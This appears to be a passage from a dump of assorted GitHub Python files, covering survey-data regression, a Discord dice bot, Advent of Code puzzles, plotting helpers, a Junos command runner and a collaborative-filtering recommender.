,np.nan).fillna(np.nan)\n\n#Fix yes/no to binary \nfor col in ['SEX','S7Q31A','S7Q1','S7Q2','S7Q3','S7Q4A1','S7Q4A2','S7Q4A3','S7Q4A4','S7Q4A5','S7Q4A6','S7Q4A7','S7Q4A8','S7Q4A9',\n'S7Q4A10','S7Q4A11','S7Q4A12','S7Q4A13','S7Q4B','S7Q5','S7Q6']:\n drinkers[col] = drinkers[col].map(mapper)\n\ndel col\ndel mapper\n \n#Add up all the drinkers Social anxiety symptoms\ndrinkers['sa_symptoms'] = drinkers[['S7Q1','S7Q2','S7Q3','S7Q4A1','S7Q4A2','S7Q4A3','S7Q4A4','S7Q4A5','S7Q4A6','S7Q4A7','S7Q4A8','S7Q4A9',\n'S7Q4A10','S7Q4A11','S7Q4A12','S7Q4A13','S7Q4B','S7Q5','S7Q6']].sum(axis=1)\n\n#Center quantitatives\ndrinkers['maxdrinks_c'] = (drinkers['S2AQ8C'] - drinkers['S2AQ8C'].mean())\ndrinkers['usualdrinks_c'] = (drinkers['S2AQ8B'] - drinkers['S2AQ8B'].mean())\ndrinkers['age_c'] = (drinkers['AGE'] - drinkers['AGE'].mean())\ndrinkers['sa_symptoms_c'] = (drinkers['sa_symptoms'] - drinkers['sa_symptoms'].mean())\n\n#DATA MANAGEMENT END----------------------------------------------------------------------------------------------------\n\n#Testing a linear regression model\n\n#Linear regression - social anxiety and incidents of abuse \nmodel1 = smf.ols('S2BQ3B ~ S7Q31A',data=drinkers).fit()\nprint(model1.summary()) \n\n#Testing a logistic regression model\n\n# likelihood of social anxiety for those who have ever had to drink more to get wanted effect\n#S2BQ1A2 - EVER HAD TO DRINK MORE TO GET THE EFFECT WANTED'\n#S2BQ1A4 - EVER INCREASE DRINKING BECAUSE AMOUNT FORMERLY CONSUMED NO LONGER GAVE DESIRED EFFECT'\nlreg = smf.logit('S7Q31A ~ S2BQ1A2 + S2BQ1A4',data= drinkers).fit()\nprint(lreg.summary())\n\nprint('Odds Ratios')\nparams = lreg.params\nconf = 
lreg.conf_int()\nconf['OR'] = params\nconf.columns = ['Lower CI','Upper CI','OR']\n\nprint(np.exp(conf))\n\n#Controlling for an extra categorical predictor \n#S2BQ1A7 - EVER HAVE PERIOD WHEN ENDED UP DRINKING MORE THAN INTENDED\nlreg2 = smf.logit('S7Q31A ~ S2BQ1A2 + S2BQ1A4 + S2BQ1A7',data= drinkers).fit()\nprint(lreg2.summary())\n\nprint('Odds Ratios')\nparams = lreg2.params\nconf = lreg2.conf_int()\nconf['OR'] = params\nconf.columns = ['Lower CI','Upper CI','OR']\n\nprint(np.exp(conf))\n\n#CONSUMER - (1 current drinker, 2 ex drinker, 3 lifetime abstainer)\n#S7Q31A - EVER DRANK ALCOHOL TO AVOID SOCIAL PHOBIA (1:yes,2:no,9:Unknown, BL: N/A)\n\n#S2AQ10 - HOW OFTEN DRANK ENOUGH TO FEEL INTOXICATED IN LAST 12 MONTHS' (1-11.99, N/A)\n#S2AQ8B NUMBER OF DRINKS OF ANY ALCOHOL USUALLY CONSUMED ON DAYS WHEN DRANK ALCOHOL IN LAST 12 MONTHS (1-98,99,BL)\n#S2AQ8C LARGEST NUMBER OF DRINKS OF ANY ALCOHOL CONSUMED ON DAYS WHEN DRANK ALCOHOL IN LAST 12 MONTHS (1-98,99,BL)\n\n#S2BQ1A2 - EVER HAD TO DRINK MORE TO GET THE EFFECT WANTED'\n#S2BQ1A4 - EVER INCREASE DRINKING BECAUSE AMOUNT FORMERLY CONSUMED NO LONGER GAVE DESIRED EFFECT'\n\n#S2BQ1A7 - EVER HAVE PERIOD WHEN ENDED UP DRINKING MORE THAN INTENDED'\n#S2BQ1A8 - EVER HAVE PERIOD WHEN KEPT DRINKING LONGER THAN INTENDED'\n\n#S2BQ3B - NUMBER OF EPISODES OF ALCOHOL ABUSE\n\n# -*- coding: utf-8 -*-\n\n","repo_name":"jamesrmccallum/Coursera","sub_path":"logit_regression.py","file_name":"logit_regression.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20792834013","text":"import re\nimport random\nimport sys\n\ntrigger = re.compile(\"^!dice\")\nkeywords = [\"dice\", \"golf\"]\n\nmatch_pattern = re.compile(r\"^!dice\\s+(\\d+)d(\\d+)(?:([+-])(\\d+))?\")\n\nasync def action(bot, msg):\n \"\"\"**!dice** _dice_**d**_sides_[+|-_modifier_]\nSimulate a dice roll. _Dice_ is the number of dice to roll and _sides_ is the number of sides each die has. 
Optionally you can specify _modifier_, prefixed with + or -.\n`!dice 1d20+3`\n \"\"\"\n match = match_pattern.match(msg.clean_content)\n\n if match:\n match_grps = match.groups()\n dice_count = int(match_grps[0])\n dice_sides = int(match_grps[1])\n\n if match_grps[2] and match_grps[3]:\n modifier_sign = match_grps[2]\n modifier = int(match_grps[3])\n if modifier_sign == \"-\":\n modifier = -modifier\n else:\n modifier = 0\n\n if dice_count < sys.maxsize and dice_sides < sys.maxsize and modifier < sys.maxsize:\n result = random.randint(dice_count, dice_count * dice_sides) + modifier\n await bot.send_message(msg.channel, str(result))\n","repo_name":"jtuu/ca.py-bot","sub_path":"src/plugins/dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17597062714","text":"# 한수 >> 각 자리가 등차수열\nimport math\n\nnum = int(input())\n\ndef hansoo(n) :\n res = []\n for i in range(1, n+1) :\n new = str(i)\n if len(new) == 1 :\n res.append(i)\n elif len(new) == 2 :\n res.append(i)\n else :\n std = len(new)\n if std % 2 == 1 :\n for j in range(std-2) :\n if int(new[j+1]) - int(new[j]) == int(new[j+2]) - int(new[j+1]) :\n res.append(i)\n return(len(res))\n\nprint(hansoo(num))\n\n \n\n \n \n","repo_name":"tldjfj123/PS","sub_path":"BOJ/1065.py","file_name":"1065.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8761706604","text":"import os.path\nfrom blend2bam.common import Settings\nfrom blend2bam.cli import convert\n\nSETTINGS = Settings()\n\nTESTDIR = os.path.dirname(os.path.abspath(__file__))\nSRCDIR = os.path.join(TESTDIR, 'assets')\n\n\ndef test_edit_mode(tmpdir):\n convert(SETTINGS, SRCDIR,\n [os.path.join(SRCDIR, 'edit_mode.blend')],\n os.path.join(tmpdir, 'edit_mode.bam'),\n )\n\n\ndef test_pose_mode(tmpdir):\n convert(SETTINGS, SRCDIR,\n [os.path.join(SRCDIR, 'pose_mode.blend')],\n os.path.join(tmpdir, 'pose_mode.bam'),\n )\n","repo_name":"Moguri/blend2bam","sub_path":"tests/test_blend2gltf.py","file_name":"test_blend2gltf.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"16"} +{"seq_id":"16024542702","text":"import collections\nimport random\nimport queue\nevent = collections.namedtuple('event', 'time id action')\n\n\ndef events(start_time, id, trip_num):\n time = yield event(start_time, id, 'leave home')\n for i in range(trip_num):\n time = yield event(time, id, 'pick up')\n time = yield event(time, id, 'drop')\n\n yield event(id, time, 'go home')\n\nclass Sim:\n def __init__(self,taxi_num):\n self.events = queue.PriorityQueue()\n self.taxi_dict = dict()\n for i in range(taxi_num):\n self.taxi_dict[i] = events(random.randint(1,5),i,random.randint(10,20))\n x = next(self.taxi_dict[i])\n print(x)\n self.events.put(x)\n\n def run(self):\n\n while True:\n evn = self.events.get()\n tmp_time,tmp_id,tmp_action = evn\n try:\n next_time = tmp_time+random.randint(2,4)\n next_env = self.taxi_dict[tmp_id].send(next_time)\n except StopIteration:\n print('end')\n else:\n self.events.put(next_env)\n print(next_env)\n\nsim = 
Sim(5)\nsim.run()","repo_name":"nie000/mylinuxlearn","sub_path":"rimi_linux_mysql/tcp_ip_socket/yield_from/taxi_sim_example/test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28320422414","text":"from typing import Optional, List, Callable, Dict, Tuple, Union, TYPE_CHECKING, Literal\nfrom tqdm import tqdm\nfrom sklearn.utils import resample\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.path import Path\nfrom matplotlib.patches import BoxStyle\nfrom matplotlib.colors import LinearSegmentedColormap\n\nif TYPE_CHECKING:\n from matplotlib.axes import Axes\n\n\ndef bootstrap(metric_function: Callable, input_resample: List[np.ndarray], n_bootstraps: int, metric_kwargs: Dict={}) -> List:\n \"\"\"\n A bootstrapping function for a metric function. The metric function should take the same number of arguments as the length of input_resample.\n\n Parameters\n ----------\n metric_function : Callable\n The metric function to use. Should take the same number of arguments as the length of input_resample.\n input_resample : List[np.ndarray]\n A list of arrays to resample. The arrays should have the same length. The arrays are passed to the metric function.\n n_bootstraps : int\n The number of bootstrap iterations.\n metric_kwargs : Dict\n Keyword arguments to pass to the metric function.\n\n Returns\n -------\n List\n A list of the metric function results for each bootstrap iteration.\n \"\"\"\n results = []\n # for each bootstrap iteration\n for _ in tqdm(range(n_bootstraps), desc='Bootsrapping', leave=True):\n # resample indices with replacement\n indices = resample(np.arange(len(input_resample[0])), replace=True)\n input_resampled = [x[indices] for x in input_resample]\n # calculate metric\n result = metric_function(*input_resampled, **metric_kwargs)\n \n results.append(result)\n \n return results\n\n\n\nclass ExtendedTextBox_v2:\n \"\"\"\n Black background boxes for titles in maptlolib subplots\n \n From:\n https://stackoverflow.com/questions/40796117/how-do-i-make-the-width-of-the-title-box-span-the-entire-plot\n https://matplotlib.org/stable/gallery/userdemo/custom_boxstyle01.html?highlight=boxstyle+_style_list\n \"\"\"\n\n def __init__(self, pad=0.3, width=500.):\n \"\"\"\n The arguments must be floats and have default values.\n\n Parameters\n ----------\n pad : float\n amount of padding\n \"\"\"\n self.width = width\n self.pad = pad\n super().__init__()\n\n def __call__(self, x0, y0, width, height, mutation_size):\n \"\"\"\n Given the location and size of the box, return the path of the box\n around it.\n\n Rotation is automatically taken care of.\n\n Parameters\n ----------\n x0, y0, width, height : float\n Box location and size.\n mutation_size : float\n Reference scale for the mutation, typically the text font size.\n \"\"\"\n # padding\n pad = mutation_size * self.pad\n # width and height with padding added\n #width = width + 2.*pad\n height = height + 3 * pad\n # boundary of the padded box\n y0 = y0 - pad # change this to move the text\n y1 = y0 + height \n _x0 = x0\n x0 = _x0 +width /2. - self.width/2.\n x1 = _x0 +width /2. 
+ self.width/2.\n # return the new path\n return Path([(x0, y0),\n (x1, y0), (x1, y1), (x0, y1),\n (x0, y0)],\n closed=True)\n\n\ndef _set_black_title_box(ax: \"Axes\", title:str, backgroundcolor='black', color='white', title_kwargs: Optional[Dict]=None):\n \"\"\"\n Note: Do not use this function by itself, instead use `set_black_title_boxes()`.\n Sets the title of the given axes with a black bounding box.\n Note: When using `plt.tight_layout()` the box might not have the correct width. First call `plt.tight_layout()` and then `set_black_title_box()`.\n\n Parameters:\n - ax: The matplotlib.axes.Axes object to set the title for.\n - title: The title string to be displayed.\n - backgroundcolor: The background color of the title box (default: 'black').\n - color: The color of the title text (default: 'white').\n - set_title_kwargs: Keyword arguments to pass to `ax.set_title()`.\n \"\"\"\n if title_kwargs is None:\n title_kwargs = {'fontdict': {\"fontname\": \"Arial Black\", \"fontweight\": \"bold\"}}\n BoxStyle._style_list[\"ext\"] = ExtendedTextBox_v2 \n ax_width = ax.get_window_extent().width\n # make title with black bounding box\n title_instance = ax.set_title(title, backgroundcolor=backgroundcolor, color=color, **title_kwargs)\n bb = title_instance.get_bbox_patch() # get bbox from title\n bb.set_boxstyle(\"ext\", pad=0.1, width=ax_width) # use custom style\n \n \ndef set_black_title_boxes(axes: \"np.ndarray[Axes]\", titles: List[str], backgroundcolor='black', color='white', title_kwargs: Optional[Dict]=None, tight_layout_kwargs: Dict={}):\n \"\"\"\n Creates black boxes for the subtitles above the given axes with the given titles. The subtitles are centered above the axes.\n\n Parameters\n ----------\n axes : np.ndarray[\"Axes\"]\n np.ndarray of matplotlib.axes.Axes objects. (Usually returned by plt.subplots() call)\n titles : List[str]\n List of titles for the axes. 
Same length as axes.\n backgroundcolor : str, optional\n Background color of boxes, by default 'black'\n color : str, optional\n Font color, by default 'white'\n title_kwargs : Dict, optional\n kwargs for the `ax.set_title()` call, by default {}\n tight_layout_kwargs : Dict, optional\n kwargs for the `plt.tight_layout()` call, by default {}\n \"\"\"\n\n for i, ax in enumerate(axes.flat):\n _set_black_title_box(ax, titles[i], backgroundcolor, color, title_kwargs)\n \n plt.tight_layout(**tight_layout_kwargs)\n \n for i, ax in enumerate(axes.flat):\n _set_black_title_box(ax, titles[i], backgroundcolor, color, title_kwargs)\n \n \n return\n \n \n \n \ndef scale_ax_bbox(ax: \"Axes\", factor: float):\n # Get the current position of the subplot\n box = ax.get_position()\n\n # Calculate the new width and the adjustment for the x-position\n new_width = box.width * factor\n adjustment = (box.width - new_width) / 2\n\n # Set the new position\n ax.set_position([box.x0 + adjustment, box.y0, new_width, box.height])\n \n return\n\n\n\ndef get_cmap(cmap_name: str, n_colors: Optional[int]=None) -> Tuple[LinearSegmentedColormap, Tuple]:\n \"\"\"\n Loads one of the custom cmaps from the cmaps folder.\n\n Parameters\n ----------\n cmap_name : str\n The name of the cmap file without the extension.\n\n Returns\n -------\n Tuple[LinearSegmentedColormap, Union[None, Tuple]]\n A tuple of the cmap and a list of colors if n_colors is not None.\n \n Example\n -------\n >>> cmap_name = 'hawaii'\n >>> cmap, color_list = get_cmap(cmap_name, n_colors=10)\n \"\"\"\n from pathlib import Path as PathClass\n \n cm_path = PathClass(__file__).parent / ('cmaps/' + cmap_name + '.txt')\n cm_data = np.loadtxt(cm_path)\n cmap_name = cmap_name.split('.')[0]\n cmap = LinearSegmentedColormap.from_list(cmap_name, cm_data)\n if n_colors is None:\n n_colors = 10\n color_list = cmap(np.linspace(0, 1, n_colors))\n return cmap, color_list\n\n\n\n ","repo_name":"joshuawe/plots_and_graphs","sub_path":"plotsandgraphs/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7275,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"16553528328","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nres = 0\nclass Solution(object):\n def sumNumbers2(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n global res\n res = 0\n path = []\n def dfs(node, path):\n if not node:\n return \n path.append(node.val)\n global res\n if node.left == None and node.right == None:\n n = len(path)\n for i in range(n-1, -1, -1):\n res += path[i]* (10**(n-1-i))\n dfs(node.left, path)\n dfs(node.right, path)\n path.pop()\n dfs(root,path)\n return res\n \n def sumNumbers(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n return self.traverse_sum(root, 0)\n def traverse_sum(self, node, parent_val):\n if not node:\n return 0\n if node.left == None and node.right == None:\n return parent_val*10 + node.val\n else:\n return self.traverse_sum(node.left, parent_val*10 + node.val) + \\\n self.traverse_sum(node.right, parent_val*10+node.val)","repo_name":"saai/codingcat","sub_path":"tree/sumNumbers.py","file_name":"sumNumbers.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18940354656","text":"from lxml import etree\nimport re\nimport logging\nfrom collections import 
OrderedDict\nfrom nornir.plugins.tasks.networking import netmiko_send_command\nfrom nornir.core.task import Result, Task\ninvaild_cmd = re.compile('^(request|clear|start|restart).*')\nget_config = re.compile('^show configuration .*')\n\nlogger = logging.getLogger(__name__)\ndef _count(txt, none): # Second arg for consistency only. noqa\n \"\"\"\n Return the exact output, as Junos displays\n e.g.:\n > show system processes extensive | match root | count\n Count: 113 lines\n \"\"\"\n count = len(txt.splitlines())\n return \"Count: {count} lines\".format(count=count)\n\ndef _trim(txt, length):\n \"\"\"\n Trim specified number of columns from start of line.\n \"\"\"\n try:\n newlines = []\n for line in txt.splitlines():\n newlines.append(line[int(length) :])\n return \"\\n\".join(newlines)\n except ValueError:\n return txt\n\ndef _except(txt, pattern):\n \"\"\"\n Show only text that does not match a pattern.\n \"\"\"\n rgx = \"^.*({pattern}).*$\".format(pattern=pattern)\n unmatched = [\n line for line in txt.splitlines() if not re.search(rgx, line, re.I)\n ]\n return \"\\n\".join(unmatched)\n\ndef _last(txt, length):\n \"\"\"\n Display end of output only.\n \"\"\"\n try:\n return \"\\n\".join(txt.splitlines()[(-1) * int(length) :])\n except ValueError:\n return txt\n\ndef _match(txt, pattern):\n \"\"\"\n Show only text that matches a pattern.\n \"\"\"\n rgx = \"^.*({pattern}).*$\".format(pattern=pattern)\n matched = [line for line in txt.splitlines() if re.search(rgx, line, re.I)]\n return \"\\n\".join(matched)\n\ndef _find(txt, pattern):\n \"\"\"\n Search for first occurrence of pattern.\n \"\"\"\n rgx = \"^.*({pattern})(.*)$\".format(pattern=pattern)\n match = re.search(rgx, txt, re.I | re.M | re.DOTALL)\n if match:\n return \"{pattern}{rest}\".format(pattern=pattern, rest=match.group(2))\n else:\n return \"\\nPattern not found\"\n\ndef _process_pipe(cmd, txt):\n \"\"\"\n Process CLI output from Juniper device that\n doesn't allow piping the output.\n \"\"\"\n if txt is None:\n return txt\n _OF_MAP = OrderedDict()\n _OF_MAP[\"except\"] = _except\n _OF_MAP[\"match\"] = _match\n _OF_MAP[\"last\"] = _last\n _OF_MAP[\"trim\"] = _trim\n _OF_MAP[\"count\"] = _count\n _OF_MAP[\"find\"] = _find\n # the operations order matter in this case!\n exploded_cmd = cmd.split(\"|\")\n pipe_oper_args = {}\n for pipe in exploded_cmd[1:]:\n exploded_pipe = pipe.split()\n pipe_oper = exploded_pipe[0] # always there\n pipe_args = \"\".join(exploded_pipe[1:2])\n # will not throw error when there's no arg\n pipe_oper_args[pipe_oper] = pipe_args\n for oper in _OF_MAP.keys():\n # to make sure the operation sequence is correct\n if oper not in pipe_oper_args.keys():\n continue\n txt = _OF_MAP[oper](txt, pipe_oper_args[oper])\n return txt\n\n\ndef junos_get(task, commands):\n if 'napalm' not in task.host.connections:\n task.host.open_connection(\"napalm\", None)\n dev = task.host.get_connection(\"napalm\", None).device\n result = {}\n for command in commands:\n if not invaild_cmd.match(command):\n #(cmd, _, _) = command.partition(\"|\")\n cmds = command.split('|')\n display = ''\n for item in cmds:\n if 'display' in item:\n display = '|' + item\n cmd_result = dev.rpc.cli(command=cmds[0]+display, format='text')\n cmd_result = etree.tostring(cmd_result, encoding='unicode')\n cmd_result = _process_pipe(command,cmd_result)\n result[command] = cmd_result\n\n else:\n logger.info('Invaild command: ' + command)\n return Result(host=task.host, result=result)\n\n \n \n\n\n 
\n\n","repo_name":"Vicnz03/nornir-play","sub_path":"plugins/junos_get.py","file_name":"junos_get.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2117546488","text":"# part 2: rope of length 10\nimport math\nclass Motion:\n def __init__(self, direction, distance):\n self.direction = direction\n self.distance = int(distance)\n\n def __str__(self):\n return f\"{self.direction} {self.distance}\"\n \nclass Rope:\n def __init__(self, row_init, col_init, rope_length):\n # Do this instead of [[]] * 10 because otherwise all lists are identical in memory\n self.rope_positions = [[row_init, col_init] for _ in range(rope_length)]\n\n def update_head(self, motion):\n if motion.direction == \"U\":\n self.rope_positions[0][0] -= 1\n elif motion.direction == \"D\":\n self.rope_positions[0][0] += 1\n elif motion.direction == \"L\":\n self.rope_positions[0][1] -= 1\n elif motion.direction == \"R\":\n self.rope_positions[0][1] += 1\n\n self.update_rope_positions()\n \n def update_rope_positions(self):\n # slicing off the first one since we already updated the head\n for head_knot_idx, tail_knot in enumerate(self.rope_positions[1:]):\n head_knot = self.rope_positions[head_knot_idx]\n tail_knot = self.update_knot_position(head_knot, tail_knot)\n\n def tail_position(self):\n return self.rope_positions[-1][0], self.rope_positions[-1][1]\n\n def update_knot_position(self, head_knot, tail_knot):\n row_distance = abs(head_knot[0] - tail_knot[0])\n col_distance = abs(head_knot[1] - tail_knot[1])\n if row_distance == 2 or col_distance == 2: # head and tail are two rows apart\n if head_knot[1] > tail_knot[1]: # head is to the right of tail\n tail_knot[1] += 1\n elif head_knot[1] < tail_knot[1]: # head is to the left of tail\n tail_knot[1] -= 1\n\n if head_knot[0] > tail_knot[0]: # head is below tail\n tail_knot[0] += 1 # move tail one row down\n elif head_knot[0] < tail_knot[0]: # head is above tail\n tail_knot[0] -= 1 # move tail one row up\n return tail_knot\n\nmotion_list = []\nwith open(\"input.txt\") as f: \n for line in f:\n l = line.strip().split(\" \")\n new_motion = Motion(l[0], int(l[1]))\n motion_list.append(new_motion)\n\ntail_location_set = set()\n\nrope = Rope(0, 0, 10)\nfor motion in motion_list:\n for _ in range(motion.distance):\n rope.update_head(motion)\n \n tail_row_idx, tail_col_idx = rope.tail_position()\n tail_location_set.add((tail_row_idx, tail_col_idx))\n\nvisited_spaces = len(list(tail_location_set))\nprint(visited_spaces)","repo_name":"stephenwashington/advent-of-code-2022","sub_path":"day9/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25009535347","text":"#! 
/usr/bin/env python\n\nimport sys\nfrom operator import mul\n\ndef wrap(dims):\n l, w, h = map(int, dims.split('x'))\n nums = [l*w, w*h, h*l]\n return min(nums) + 2*sum(nums)\n\ndef ribbon(dims):\n nums = map(int, dims.split('x'))\n product = reduce(mul, nums, 1)\n nums.remove(max(nums))\n return 2*sum(nums) + product\n\ntotal = 0\nribbon_total = 0\nfor line in sys.stdin:\n total += wrap(line)\n ribbon_total += ribbon(line)\nprint('Total square feet required: %d' % total)\nprint('Total ribbon required: %d' % ribbon_total)\n","repo_name":"vinceau/adventofcode","sub_path":"2015/day2/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18584704283","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nn = 12\r\nX = np.arange(n) #range()只能整数\r\nY1 = (1 - X / float(n)) * np.random.uniform(0.5,1.0,n)\r\nY2 = (1 - X / float(n)) * np.random.uniform(0.5,1.0,n)\r\n\r\nplt.bar(X,+Y1,facecolor='#9999ff',edgecolor='white')#条形图颜色\r\nplt.bar(X,-Y2,facecolor='#ff9999',edgecolor='white')\r\n\r\n#加标注\r\nfor x,y in zip(X,Y1): #通过zip()使每一步同时输出两个值 用时详查\r\n plt.text(x ,y + 0.05,'%.2f'%y, ha='center',va='bottom') #ha:horizontal alignment 横向对齐方式 va:纵向\r\nfor x,y in zip(X,Y2): #通过zip()使每一步同时输出两个值 用时详查\r\n plt.text(x ,-y - 0.05,'-%.2f'%y, ha='center',va='top') #ha:horizontal alignment 横向对齐方式 va:纵向\r\n\r\nplt.xlim(-0.5,n)\r\nplt.xticks(())\r\nplt.ylim(-1.25,1.25)\r\nplt.yticks(())\r\n\r\nplt.show()","repo_name":"XiaoMaFenJu/matplotlib","sub_path":"matplotlib_learn_bar.py","file_name":"matplotlib_learn_bar.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11241415947","text":"#coding=utf-8\r\nimport os\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\ndef curve_in_create(lift_data,file_name):\r\n\r\n lines = [\r\n \"TEMPORAL\",\r\n \"valve\",\r\n \"direction 0 0 -1\",\r\n \"min_lift 1e-05\",\r\n \"CYCLIC 360.0\",\r\n \"crank lift\",\r\n ]\r\n\r\n # Open the file in write mode\r\n with open(file_name, \"w\") as file:\r\n # Write the first 6 lines\r\n for line in lines:\r\n file.write(line + \"\\n\")\r\n\r\n # Write the lift_data\r\n for data in lift_data:\r\n line = f\"{data[0]} {data[1]}\"\r\n file.write(line + \"\\n\")\r\n\r\n print(f\"File {file_name} created.\")\r\n\r\ndef poly5(x,load,index):\r\n '''\r\n 该函数应该包括8个5次多项式,load有四种:100Load,75Load,50Load,25Load,index有两种:qian,hou\r\n 本文件中以75Load为基准,所有负荷采用相同的系数'''\r\n coefficients = {\r\n '100Load': {\r\n 'qian': [-6.13325E-8, 3.37332E-6, -6.81692E-5, 6.6485E-4, -7.40193E-4, 4.92942E-4], \r\n 'hou': [-8.5746E-9, -7.19828E-7, -1.8133E-5, -1.1418E-4, -0.00117, -3.15943E-4], \r\n },\r\n '75Load': {\r\n 'qian': [-6.13325E-8, 3.37332E-6, -6.81692E-5, 6.6485E-4, -7.40193E-4, 4.92942E-4],\r\n 'hou': [-8.5746E-9, -7.19828E-7, -1.8133E-5, -1.1418E-4, -0.00117, -3.15943E-4],\r\n },\r\n '50Load': {\r\n 'qian': [-6.13325E-8, 3.37332E-6, -6.81692E-5, 6.6485E-4, -7.40193E-4, 4.92942E-4], \r\n 'hou': [-8.5746E-9, -7.19828E-7, -1.8133E-5, -1.1418E-4, -0.00117, -3.15943E-4],\r\n },\r\n '25Load': {\r\n 'qian': [-6.13325E-8, 3.37332E-6, -6.81692E-5, 6.6485E-4, -7.40193E-4, 4.92942E-4], \r\n 'hou': [-8.5746E-9, -7.19828E-7, -1.8133E-5, -1.1418E-4, -0.00117, -3.15943E-4], \r\n },\r\n }\r\n \r\n # Get the coefficients for the given load and index\r\n a, b, c, d, e, f = coefficients[load][index]\r\n\r\n # 
Evaluate the polynomial at x using the coefficients\r\n y = a * x**5 + b * x**4 + c * x**3 + d * x**2 + e * x + f\r\n \r\n return y\r\n\r\ndef EVlift(load,EVO,EVC,max_lift):\r\n '''\r\n 该函数用于构造升程曲线'''\r\n CA=np.arange(0,360.5,0.5)\r\n S1=[]\r\n S2=[]\r\n for x in np.arange(0,180,0.5):\r\n if x<=EVO:\r\n S1.append(0)\r\n elif x>EVO and poly5(x-EVO,load,index='qian')=EVC:\r\n S2.append(0)\r\n elif x= 16 and age <= 65:\n# print(\"Have a good day at work!\")\n\n\n# Python allows ranges to be expressed in this condensed format\nif 16 <= age <= 65:\n print(\"Have a good day at work!\")\n\n# Python does not have a boolean data type, but it has two constants \"True\" and \"False\"\n# The function bool coerces to the appropriate value\nif False or True:\n print(\"Okay\")\n\nprint(\"\"\"False: {}\nNone: {}\n0: {}\n0.0: {}\nempty List []: {}\nempty tuple (): {}\nempty string '': {}\nempty string \"\": {}\nempty mapping: {}\n\"\"\".format(False, bool(None), bool(0), bool(0.0), bool([]), bool(()), bool(''), bool(\"\"), bool({})))\n\n# Negation is performed using the not keyword\nprint(\"not False is {}\".format(not False))\n","repo_name":"Hardeep18/python-masterclass","sub_path":"IfProgramFlow/IfProgramFlow.py","file_name":"IfProgramFlow.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18313581965","text":"import argparse\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport math\nimport os \nimport warnings\nwarnings.filterwarnings('ignore')\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom scipy.stats import pearsonr\nfrom collections import defaultdict\nfrom tqdm import tqdm\nfrom evaluate import rec_eval\n\n\ndef load_data(file_path):\n \"\"\"\n 加载数据\n \"\"\"\n with open(os.path.join(file_path,'train_users.txt'), 'rb') as f1:\n train_users = pickle.load(f1)\n with open(os.path.join(file_path,'valid_users.txt'), 'rb') as f2:\n valid_users = pickle.load(f2) \n\n return train_users, valid_users\n\n\ndef Cosine_UserCF(tra_users, val_users, K , N):\n \"\"\"\n 仅预测是否会评分,不包含具体rating\n \"\"\"\n # 建立item->users倒排表\n # 倒排表的格式为: {item_id1: {user_id1, user_id2, ... 
, user_idn}, item_id2: ...} 也就是每个item对应有那些用户有过点击\n # 建立倒排表的目的就是为了更方便的统计用户之间共同交互的商品数量\n print('建立倒排表...')\n item_users = {}\n for uid, items in tqdm(tra_users.items()): # 遍历每一个用户的数据,其中包含了该用户所有交互的item\n for item in items: # 遍历该用户的所有item, 给这些item对应的用户列表添加对应的uid\n if item not in item_users:\n item_users[item] = set()\n item_users[item].add(uid)\n\n\n # 只要用户u,v共同交互过某个物品,它们之间的相似度就 +1 ---> 协同过滤矩阵\n # 最后再除以 sqrt(N(u)*N(v)) ---> 相似度矩阵\n\n\n # 计算用户协同过滤矩阵 \n # 即利用item-users倒排表统计用户之间交互的商品数量,用户协同过滤矩阵的表示形式为:sim = {user_id1: {user_id2: num1}, user_id3:{user_id4: num2}, ...}\n # 协同过滤矩阵是一个双层的字典,用来表示用户之间共同交互的商品数量\n # 在计算用户协同过滤矩阵的同时还需要记录每个用户所交互的商品数量,其表示形式为: num = {user_id1:num1, user_id2:num2, ...}\n sim = {}\n num = {}\n print('构建协同过滤矩阵...')\n for item, users in tqdm(item_users.items()): # 遍历所有的item去统计,用户两两之间共同交互的item数量\n for u in users:\n if u not in num: # 如果用户u不在字典num中,提前给其在字典中初始化为0,否则后面的运算会报key error\n num[u] = 0\n num[u] += 1 # 统计每一个用户,交互的总的item的数量\n if u not in sim: # 如果用户u不在字典sim中,提前给其在字典中初始化为一个新的字典,否则后面的运算会报key error\n sim[u] = {}\n for v in users:\n if u != v: # 只有当u不等于v的时候才计算用户之间的相似度 \n if v not in sim[u]:\n 